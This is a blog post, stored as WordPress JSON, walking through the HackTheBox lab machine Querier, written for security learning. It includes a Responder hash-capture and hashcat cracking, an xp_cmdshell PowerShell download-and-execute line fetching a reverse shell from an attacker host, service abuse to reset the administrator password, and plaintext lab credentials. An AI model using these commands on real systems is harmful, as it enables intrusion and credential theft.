{"id":336,"date":"2020-07-07T17:54:34","date_gmt":"2020-07-07T17:54:34","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=336"},"modified":"2020-07-07T17:54:39","modified_gmt":"2020-07-07T17:54:39","slug":"querier-hackthebox-walkthrough","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/querier-hackthebox-walkthrough\/","title":{"rendered":"Querier: Hackthebox walkthrough"},"content":{"rendered":"\n<p>Hello Everyone!! In this post we will see how to pwn <strong>Querier<\/strong> from <strong>hackthebox<\/strong>.\u00a0<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<p>Querier is a <strong>medium windows machine<\/strong>. The initial foothold requires to enumerate the <strong>smb shares<\/strong> to obtain the password for a user, reporting who can log in in to the <strong>mssql-server<\/strong>. To get the user on the system, we can steal the hash of <strong>mssql-svc<\/strong> user by running <strong>xp_dirtree<\/strong> command. Privilege escalation to the administrator is pretty straight forward as the box stores the administrator creds in the GPP .XML files.<\/p>\n\n\n\n<p>With all that being said, let\u2019s get started.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Initial foothold<\/h2>\n\n\n\n<p>Running a nmap scan resulted in a lot of open ports. But this time port 80 wasn\u2019t present. So the only remaining point to start the enumeration was smb.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background scroll\"># nmap -sC -sV -o querier.nmap 10.10.10.125\n\nNmap scan report for 10.10.10.125\nHost is up (0.27s latency).\nNot shown: 996 closed ports\nPORT STATE SERVICE \u00a0 VERSION\n135\/tcp\u00a0 open\u00a0 msrpc \u00a0 \u00a0 Microsoft Windows RPC\n139\/tcp\u00a0 open\u00a0 netbios-ssn \u00a0 Microsoft Windows netbios-ssn\n445\/tcp\u00a0 open\u00a0 microsoft-ds?\n1433\/tcp open\u00a0 ms-sql-s\u00a0 Microsoft SQL Server\u00a0 14.00.1000.00\n| ms-sql-ntlm-info:\n| \u00a0 Target_Name: HTB\n| \u00a0 NetBIOS_Domain_Name: HTB\n| \u00a0 NetBIOS_Computer_Name: QUERIER\n| \u00a0 DNS_Domain_Name: HTB.LOCAL\n| \u00a0 DNS_Computer_Name: QUERIER.HTB.LOCAL\n| \u00a0 DNS_Tree_Name: HTB.LOCAL\n|_\u00a0 Product_Version: 10.0.17763\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2020-07-05T15:44:27\n|_Not valid after:\u00a0 2050-07-05T15:44:27\n|_ssl-date: 2020-07-05T15:45:28+00:00; +4m44s from scanner time.\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: mean: 4m44s, deviation: 0s, median: 4m43s\n| ms-sql-info:\n| \u00a0 10.10.10.125:1433:\n| Version:\n| \u00a0 name: Microsoft SQL Server\n| \u00a0 number: 14.00.1000.00\n| \u00a0 Product: Microsoft SQL Server\n|_ TCP port: 1433\n| smb2-security-mode:\n| \u00a0 2.02:\n|_ Message signing enabled but not required\n| smb2-time:\n| \u00a0 date: 2020-07-05 21:15:32\n|_\u00a0 start_date: N\/A\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\n# Nmap done at Sun Jul\u00a0 5 21:10:54 2020 -- 1 IP address (1 host up) scanned in 41.58 seconds<\/pre>\n\n\n\n<p>Meanwhile I started a full port scan as well<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># nmap -p-&nbsp; -sV -A -T4 -vv 10.10.10.125 -o fullport.nmap<\/pre>\n\n\n\n<p>Listed all the shares with smbclient<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">\u26a1 root@kali\u00a0 ~\/Desktop\/htb\/querier> master\u00a0 smbclient -L 10.10.10.125\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\nEnter WORKGROUP\\root's password:\n\n\u00a0\u00a0\u00a0\u00a0Sharename \u00a0 Type\u00a0 Comment\n\u00a0\u00a0\u00a0\u00a0--------- \u00a0 ----\u00a0 -------\n\u00a0\u00a0\u00a0\u00a0ADMIN$\u00a0 \u00a0 \u00a0 Disk\u00a0 Remote Admin\n\u00a0\u00a0\u00a0\u00a0C$\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Disk\u00a0 Default share\n\u00a0\u00a0\u00a0\u00a0IPC$\u00a0 \u00a0 \u00a0 \u00a0 IPC \u00a0 Remote IPC\n\u00a0\u00a0\u00a0\u00a0Reports \u00a0 \u00a0 Disk<\/pre>\n\n\n\n<p>Reports share seemed a custom one created so I listed its contents with smbmap<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># smbmap -R \u201cReports\u201d -H 10.10.10.125<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/P1U6FxUmLA-5b-arSeU_A8yjxqpt4dTu1bCx0DZ2Ykifx1p1EtQG3zAN1snYEIONUWAEybG0SQvaA0kqRZ_DSM57iU85S2MxUMWEX6grrOKVM1tJLxDGWQhqfYObc74n1DWHyFQ1\" alt=\"\"\/><figcaption>enumerating the contents of  Reports<\/figcaption><\/figure>\n\n\n\n<p>Downloaded the xlsm file with smbmap<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">#smbmap -R \"Reports\"&nbsp; -H 10.10.10.125 -A 'Currency Volume Report.xlsm'<\/pre>\n\n\n\n<p>If you are unaware of .xlsm extension, let me answer it for you.<\/p>\n\n\n\n<p>Files with <strong>XLSM<\/strong> extension is a type of Spreasheet files that support Macros. <strong>XLSM<\/strong> files are similar to XLM file formats but are based on the Open XML format introduced in Microsoft Office 2007. A macro is used to record the steps that are performed repeatedly and facilitates performing the actions by running the macro again. All the steps performed by the users are recorded and the process is termed macro recording. Macro recording generates VBA code in the form of a macro that can be edited using the Visual Basic Editor (VBE).<\/p>\n\n\n\n<p>There is a python package available that works with this extension. It can be installed with pip<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># pip install python-oletools<\/pre>\n\n\n\n<p>Under oletools, we have<strong><span class=\"has-inline-color has-vivid-cyan-blue-color\"><a href=\"https:\/\/github.com\/decalage2\/oletools\"> olevba<\/a><\/span><\/strong> that is used to extract and <strong>analyze VBA Macro source code from MS Office documents.<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># olevba 10.10.10.125-Reports_Currency\\ Volume\\ Report.xlsm<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/iGWIrx5BbWBgh6mF3jbMiFYSslV-LHYn2zhmll8ZkZGm4ahyMuR8lGgUnBoGERXWmEt5wn6NnEOrGrEAFSVPXnfEsM92XZ6g8Ksq3Ryu8E8Ct2aHsmEfWYwiU1sH2en_7n5Ccfun\" alt=\"\"\/><\/figure>\n\n\n\n<p>Username: Password -> <strong>reporting:PcwTWTHRwryjc$c6<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/lC12_ff8KYD7E-iA2PIn2L8r9yyCi_mxBbyHejNEFuAXNLO0annBWoDxhcU_x2rUs5SYGGX9Vp3uluIFLXWHDenD3D7xh30T2z6CZav3F4zaIiqyxJSfIpCF18jODBMVfXlRvKjg\" alt=\"\"\/><\/figure>\n\n\n\n<p>In the output we can see that the olevba retrieved us the username and the password.<\/p>\n\n\n\n<p>So now lets try to login into the mssql server.<\/p>\n\n\n\n<p>Here the impacket script, <strong>mssqlclient.py<\/strong> can be used to login to the server. <strong>-windows-auth<\/strong> flag has to be explicitly specified as it is disabled by default.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># mssqlclient.py reporting@10.10.10.125 -windows-auth<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/jEuotyRTr7OvTfWgk0egToSvKFoSP_tHBdUMSc1-e_ywN6rz96iTWLTiE6xfc1j12WKwkGDpTTQO4eJZGwfy5Ene-vCjx4tukAecKcSXRTSOECFuNSWAhisexQhnY3JVrDUeP6Lr\" alt=\"\"\/><\/figure>\n\n\n\n<p>And we are logged in!!!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Getting the user.txt<\/h2>\n\n\n\n<p>With reporting as user, we had minimal privileges. But the user can easily steal the hash of the service running. This can be done with<strong> xp_dirtree<\/strong>. It is a stored procedure that returns a list of every folder, every subfolder, and every file for path you give it. Here we can set the path to a fake share name that doesn&#8217;t even exist and start a responder on tun0. When the service tried to access the share, the responder will log the hash of service account.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># xp_dirtree \u2018\\\\10.10.1415\\test\\\u2019<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/cQuHPAJ_aNWf1klP-aAoSOoBuS85f7hDR2NUG4JCo_j3L91GjtUIHPcTVKgmpo09zkcrE3CNR5bUWs1vdgof1nmZvzqfcjpn0uihFavTlDSnyGtn0mlJQaz1eLzRuhDhU4F1yyx1\" alt=\"\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># responder -I tun0<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/0mwx2cdoF5w1fXQ4NafOaK4uDXK5dp2zO9gYzjMy1BPRvXwwvHyxoD0soHQkSwgAvlJCpJyF_idoAtBBQUmZKQp6MW06NsIBqzKXa2EwyKx7ZlEs8cW0yBdNRVAV5N4pwOUms7Pb\" alt=\"\"\/><\/figure>\n\n\n\n<p>The hash is of the type <strong>NTLMv2<\/strong>. We can find the mode of the hash inside hashcat example hashes and it comes out to be <strong>5600.<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># hashcat -m 5600 hash_sql \/usr\/share\/wordlists\/rockyou.txt --force<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/aIvLKYlV8tw36twbHR5oHxANYBbQEQHLDHR_3pPHVCezLcT4A1WQL6ASqQqk5XE94s1cm_M_XGl_qjzzkBM7zb2K5FLOwlI9wY_eUwbcYB1znUzmWxIc001Um2dPq1qiziulcZWU\" alt=\"\"\/><\/figure>\n\n\n\n<p>The username is <strong>mssql-svc<\/strong>(can be seen in the hash) password is <strong>corporate568<\/strong>. After trying these creds on mssqlclient.py, I got successfully logged in.\u00a0<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/NID-TfpAZ3xWraq6yeTIgVJpS2wqHv2Z4Dhii6O9O0rAxaUktm85u5r5MKtdzTBE3aWCJvXSfUml_YlCCyp4Wd2EXHWLkd55_dTeiit_sMAXzWUM4G0djmHWpACrg6Q780qc5ekp\" alt=\"\"\/><\/figure>\n\n\n\n<p>This time the <strong>enable_xp_cmdshell<\/strong> was available for the user. With this command we can execute commands on the sql-server.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/dQa2y9JzOjuExVfputHGBpP2_TWyFUaPGb3BhL2unZT9NqnDPD3hDco3r0273f08QzgWwcxkm9Keq8M_mBXwHZwrVa1gG45Ubw38z231cNnGWPt6pmypotGP8oHyek2UL5lNjzfz\" alt=\"\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/lVFvz7IzR1helxoaEUAKc0c4twi8BESkQCNwGvLwt4uU3Q-93_7vFhIWV73YM10Jo0e4JfHj9BgNZfbEBEbOu6nqqKkneSJsvVNCBbp5h2jjG572eY_SIdI2hfPGzIqPjQY7aIrO\" alt=\"\"\/><\/figure>\n\n\n\n<p>We are now mssql-svc.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reverse shell<\/h2>\n\n\n\n<p>I used<strong> Invoke-PowerShellTcp.ps1<\/strong> from <a href=\"https:\/\/github.com\/samratashok\/nishang\"><strong><span class=\"has-inline-color has-vivid-cyan-blue-color\">nishang<\/span><\/strong><\/a> scripts to obtain the reverse shell. Set up the nc listener and <strong>SimpleHTTPServer<\/strong> on port 80.<\/p>\n\n\n\n<p>Run the following command on the sql prompt<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&gt; xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\\\"http:\/\/10.10.14.15\/rev.ps1\\\")<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/-hLE3blhCTNGR3mJmemQdbOMwetPCIhTPigdd5b1EpGSoEI09_RksA8pZsuTo51KpazKGBMV2pwY4Dz9sgw-LxiPeBWt6ibhmcvlLkI9pw4v5CsTcW8XSy8c8fsr5liVQcofqiYw\" alt=\"Got shell as mssql-svc\"\/><figcaption>Got shell as mssql-svc<\/figcaption><\/figure>\n\n\n\n<p>An we got the shell. Grab the user.txt<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege escalation to administrator<\/h2>\n\n\n\n<p>Upload the <strong><a href=\"https:\/\/github.com\/PowerShellMafia\/PowerSploit\/blob\/dev\/Privesc\/PowerUp.ps1\" target=\"_blank\" rel=\"noreferrer noopener\"><span class=\"has-inline-color has-vivid-cyan-blue-color\">PowerUp.ps1<\/span><\/a><\/strong> script from powersploit tools that\u2019s used to enumerate the box.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># xp_cmdshell powershell IEX(New-Object Net.Webclient).downloadString(\\\"<a href=\"http:\/\/10.10.14.15\/PowerUp.ps1%5C\">http:\/\/10.10.14.15\/PowerUp.ps1\\<\/a>\")<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># Invoke-AllChecks<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/Bmjj4Ogqm-KaSHWNWstv7bUQwndz1i_9LTOHCfsQ_OLlg7PiLqxt-C9cB-rsKXPy8TXuXP-21iYDPE-tqOzQQ8WmUVCqq1JEHISIDhL-qs9MJhJe9B4WOz61iHErqeo_uId6Seqi\" alt=\"\"\/><\/figure>\n\n\n\n<p>In the results of PowerUp enumeration, I found two routes that could lead us to administrator.\u00a0 First was abusing the<strong> usosvc service<\/strong> as we had the privilege to restart the service. I will show this route at the end of the blog.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/5DjkwkwLLiwhuwP3Vsw4m8QQGwgvODeUySFKd9rc46J_cSQbcxrYmwKNAsdi6q4Muoo3nuiWd2lXAnmiTijJ8fIeD0LE_O4fIH-_6oNlhksX8rLfoKU_Nrt5iO6WoDxh2ZBZaq83\" alt=\"\"\/><\/figure>\n\n\n\n<p>In the enumeration, I also found the<strong> GPP .xml files<\/strong> that directly returned the password of the administrator.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/o6qZc__4H3IxwRE2SIxYX-Q1DoaGrhLJ291mZeQ4wB7XiDs5pr2nxur0APPV0jXgrjDaRclxC3M2zDjNhCXMKX5oQW0VWvcBLkMcTO0q4VOptTUQbQWBljPONY69NTQfEvYl1vux\" alt=\"\"\/><\/figure>\n\n\n\n<p><strong>Administrator:MyUnclesAreMarioAndLuigi!!1!<\/strong><\/p>\n\n\n\n<p>I used these creds on impacket\u2019s <strong><a href=\"https:\/\/github.com\/SecureAuthCorp\/impacket\/blob\/master\/examples\/psexec.py\"><span class=\"has-inline-color has-vivid-cyan-blue-color\">psexec.py<\/span><\/a><\/strong> and got successfully logged in.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># psexec.py administrator@10.10.10.125<\/pre>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/sD3altpHqnYrLYqJBucj0XgtAZ2r55MrwfyIgp2Z9vPKR25yq99_D6MXtTRLGNvv9He0nzwDe8IC8kzAI2NFT4HoiUTT1ysj-1mebHfGx0c0mlkezXXFjHcvNZ_l5NUgeQXRAOQo\" alt=\"\"\/><\/figure>\n\n\n\n<p>Box is pwned!!!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Now the alternative!<\/h2>\n\n\n\n<p>Since we could abuse the usosvc service, I tried running<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\"># Invoke-ServiceAbuse -Name \u2018UsoSvc\u2019 -Command \u2018net user administrator hacked!!\u2019<\/pre>\n\n\n\n<p>This command will change the password of administrator to <strong>hacked!!<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/JrgIWRMwqae3CmwtoW_08BOZlZVVV2V6O8u9vpGyDGblUa9cA92guXade38BAFBp2cDpZjkquiWf93zZ1kwxW3urfdMveZO3R3zZo4BJdfIh_-l_EC6dWlzviOjo0l42BnoXJMhe\" alt=\"\"\/><\/figure>\n\n\n\n<p>Again, the creds can be used with<strong> psexec.py<\/strong> to obtain the shell as admin.<\/p>\n\n\n\n<p>Thats all for the blog post. Thanks for reading! For more such content subscribe to my page.<\/p>\n\n\n\n<p>See you in the next one!! Until then, happy hunting.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Querier is a medium level windows machine. It exploits the mssql-server running on the box. The privilege escalation to administrator exploits GPP xml files<\/p>\n","protected":false},"author":1,"featured_media":338,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[19,2,141],"tags":[213,26,120,210,209,216,219,215,208,211,217,212,113,214,218],"class_list":["post-336","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hackthebox","category-information-security","category-linux","tag-gpp","tag-hackthebox","tag-impacket","tag-mssql-server","tag-mssql-svc","tag-mssqlclient-py","tag-nishang","tag-olevba","tag-querier-htb","tag-reporting","tag-responder","tag-shares","tag-smb","tag-xlsm","tag-xp_dirtree","entry","has-media"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/336"}],"collection":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/comments?post=336"}],"version-history":[{"count":2,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/336\/revisions"}],"predecessor-version":[{"id":339,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/posts\/336\/revisions\/339"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media\/338"}],"wp:attachment":[{"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/media?parent=336"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/categories?post=336"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/shreyapohekar.com\/blogs\/wp-json\/wp\/v2\/tags?post=336"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}